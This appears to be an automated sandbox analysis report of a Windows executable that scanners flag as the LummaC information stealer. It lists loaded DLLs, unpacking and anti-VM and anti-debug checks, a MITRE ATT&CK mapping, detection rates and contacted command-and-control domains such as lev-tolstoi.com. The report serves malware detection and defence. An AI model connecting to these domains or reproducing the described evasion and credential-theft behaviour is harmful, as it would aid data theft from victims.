Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior

Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe

Unpacked PE file: 0.2.L5Kgf2Tvkc.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.CRT:R;.reloc:R;

Detected unpacking (overwrites its own PE header)

Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe

Unpacked PE file: 0.2.L5Kgf2Tvkc.exe.400000.0.unpack

Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe	Code function: 0_2_0043D950 push eax; mov dword ptr [esp], 71708F5Eh	0_2_0043D951
Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe	Code function: 0_2_0043AD30 push eax; mov dword ptr [esp], ADAEAFA0h	0_2_0043AD3E
Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe	Code function: 0_2_00476005 push dword ptr [edx+21h]; iretd	0_2_00476018
Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe	Code function: 0_2_004731A2 pushad ; ret	0_2_004731A3
Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe	Code function: 0_2_00477A58 push dword ptr [86509614h]; retf	0_2_00477AC0
Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe	Code function: 0_2_00473421 push ebp; ret	0_2_00473424
Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe	Code function: 0_2_0062EA8C push edx; ret	0_2_0062EA8D
Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe	Code function: 0_2_0065DBB7 push eax; mov dword ptr [esp], 71708F5Eh	0_2_0065DBB8
Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe	Code function: 0_2_0065AF97 push eax; mov dword ptr [esp], ADAEAFA0h	0_2_0065AFA5

Source: L5Kgf2Tvkc.exe

Static PE information: section name: .text entropy: 7.787200466490556

Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe TID: 5408	Thread sleep time: -90000s >= -30000s			Jump to behavior
Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe TID: 416	Thread sleep time: -30000s >= -30000s			Jump to behavior

Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Windows\SysWOW64\WerFault.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Windows\SysWOW64\WerFault.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS

Source: Amcache.hve.3.dr	Binary or memory string: VMware
Source: Amcache.hve.3.dr	Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.3.dr	Binary or memory string: vmci.syshbin
Source: Amcache.hve.3.dr	Binary or memory string: VMware, Inc.
Source: Amcache.hve.3.dr	Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.3.dr	Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.3.dr	Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.3.dr	Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: L5Kgf2Tvkc.exe, 00000000.00000002.2043758470.000000000070E000.00000004.00000020.00020000.00000000.sdmp, L5Kgf2Tvkc.exe, 00000000.00000002.2043758470.00000000006B9000.00000004.00000020.00020000.00000000.sdmp, L5Kgf2Tvkc.exe, 00000000.00000003.1769286831.00000000006B9000.00000004.00000020.00020000.00000000.sdmp, L5Kgf2Tvkc.exe, 00000000.00000003.1764952371.000000000070E000.00000004.00000020.00020000.00000000.sdmp, L5Kgf2Tvkc.exe, 00000000.00000003.1769286831.000000000070E000.00000004.00000020.00020000.00000000.sdmp, L5Kgf2Tvkc.exe, 00000000.00000003.1764837148.000000000070E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: Amcache.hve.3.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.3.dr	Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.3.dr	Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.3.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.3.dr	Binary or memory string: vmci.sys
Source: Amcache.hve.3.dr	Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
Source: Amcache.hve.3.dr	Binary or memory string: vmci.syshbin`
Source: Amcache.hve.3.dr	Binary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.3.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.3.dr	Binary or memory string: VMware20,1
Source: Amcache.hve.3.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.3.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.3.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.3.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.3.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.3.dr	Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.3.dr	Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.3.dr	Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.3.dr	Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.3.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.3.dr	Binary or memory string: vmci.inf_amd64_68ed49469341f563

Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe

Code function: 0_2_0043C330 LdrInitializeThunk,

0_2_0043C330

Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe	Code function: 0_2_00470083 push dword ptr fs:[00000030h]	0_2_00470083
Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe	Code function: 0_2_0062092B mov eax, dword ptr fs:[00000030h]	0_2_0062092B
Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe	Code function: 0_2_00620D90 mov eax, dword ptr fs:[00000030h]	0_2_00620D90

HIPS / PFW / Operating System Protection Evasion

LummaC encrypted strings found

Source: L5Kgf2Tvkc.exe	String found in binary or memory: debonairnukk.xyz
Source: L5Kgf2Tvkc.exe	String found in binary or memory: diffuculttan.xyz
Source: L5Kgf2Tvkc.exe	String found in binary or memory: effecterectz.xyz
Source: L5Kgf2Tvkc.exe	String found in binary or memory: deafeninggeh.biz
Source: L5Kgf2Tvkc.exe	String found in binary or memory: immureprech.biz
Source: L5Kgf2Tvkc.exe	String found in binary or memory: spellshagey.biz

Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe

Queries volume information: C:\ VolumeInformation

Jump to behavior

Source: C:\Users\user\Desktop\L5Kgf2Tvkc.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: Amcache.hve.3.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.3.dr	Binary or memory string: msmpeng.exe
Source: Amcache.hve.3.dr	Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.3.dr	Binary or memory string: MsMpEng.exe

Stealing of Sensitive Information

Yara detected LummaC Stealer

Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR

Remote Access Functionality

Yara detected LummaC Stealer

Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Windows Management Instrumentation	1 DLL Side-Loading	1 Process Injection	2 Virtualization/Sandbox Evasion	OS Credential Dumping	21 Security Software Discovery	Remote Services	1 Screen Capture	11 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 PowerShell	Boot or Logon Initialization Scripts	1 DLL Side-Loading	1 Process Injection	LSASS Memory	2 Virtualization/Sandbox Evasion	Remote Desktop Protocol	1 Archive Collected Data	1 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	11 Deobfuscate/Decode Files or Information	Security Account Manager	1 Process Discovery	SMB/Windows Admin Shares	2 Clipboard Data	3 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	4 Obfuscated Files or Information	NTDS	22 System Information Discovery	Distributed Component Object Model	Input Capture	114 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	22 Software Packing	LSA Secrets	Internet Connection Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	Wi-Fi Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
L5Kgf2Tvkc.exe	71%	Virustotal		Browse
L5Kgf2Tvkc.exe	74%	ReversingLabs	Win32.Ransomware.RedLine
L5Kgf2Tvkc.exe	100%	Avira	HEUR/AGEN.1306978
L5Kgf2Tvkc.exe	100%	Joe Sandbox ML

Dropped Files

⊘No Antivirus matches

Unpacked PE Files

⊘No Antivirus matches

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label
https://community.fastly/	0%	Avira URL Cloud	safe
https://community.fastly.	0%	Avira URL Cloud	safe
https://lev-tolstoi.com/apiHft2	100%	Avira URL Cloud	malware
https://lev-tolstoi.com/apiDN	100%	Avira URL Cloud	malware
https://lev-tolstoi.com/33	100%	Avira URL Cloud	malware
https://lev-tolstoi.com/apil1	100%	Avira URL Cloud	malware
spellshagey.biz	100%	Avira URL Cloud	malware
https://lev-tolstoi.com/S	100%	Avira URL Cloud	malware
https://lev-tolstoi.com/xe$N	100%	Avira URL Cloud	malware

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
steamcommunity.com	23.55.153.106	true	false	high
lev-tolstoi.com	172.67.157.254	true	false	high
sordid-snaked.cyou	unknown	unknown	false	high
diffuculttan.xyz	unknown	unknown	false	high
effecterectz.xyz	unknown	unknown	false	high
spellshagey.biz	unknown	unknown	true	unknown
awake-weaves.cyou	unknown	unknown	false	high
immureprech.biz	unknown	unknown	false	high
wrathful-jammy.cyou	unknown	unknown	false	high
deafeninggeh.biz	unknown	unknown	false	high
debonairnukk.xyz	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
sordid-snaked.cyou	false		high
deafeninggeh.biz	false		high
diffuculttan.xyz	false		high
effecterectz.xyz	false		high
wrathful-jammy.cyou	false		high
https://steamcommunity.com/profiles/76561199724331900	false		high
awake-weaves.cyou	false		high
immureprech.biz	false		high
debonairnukk.xyz	false		high
https://lev-tolstoi.com/api	false		high
spellshagey.biz	true	Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://community.fastly/	L5Kgf2Tvkc.exe, 00000000.00000002.2043758470.00000000006B9000.00000004.00000020.00020000.00000000.sdmp, L5Kgf2Tvkc.exe, 00000000.00000003.1769286831.00000000006B9000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://steamcommunity.com/my/wishlist/	L5Kgf2Tvkc.exe, 00000000.00000003.1764936835.000000000075F000.00000004.00000020.00020000.00000000.sdmp, L5Kgf2Tvkc.exe, 00000000.00000003.1764794699.0000000000756000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png	L5Kgf2Tvkc.exe, 00000000.00000003.1764936835.000000000075F000.00000004.00000020.00020000.00000000.sdmp, L5Kgf2Tvkc.exe, 00000000.00000003.1764794699.0000000000756000.00000004.00000020.00020000.00000000.sdmp	false		high
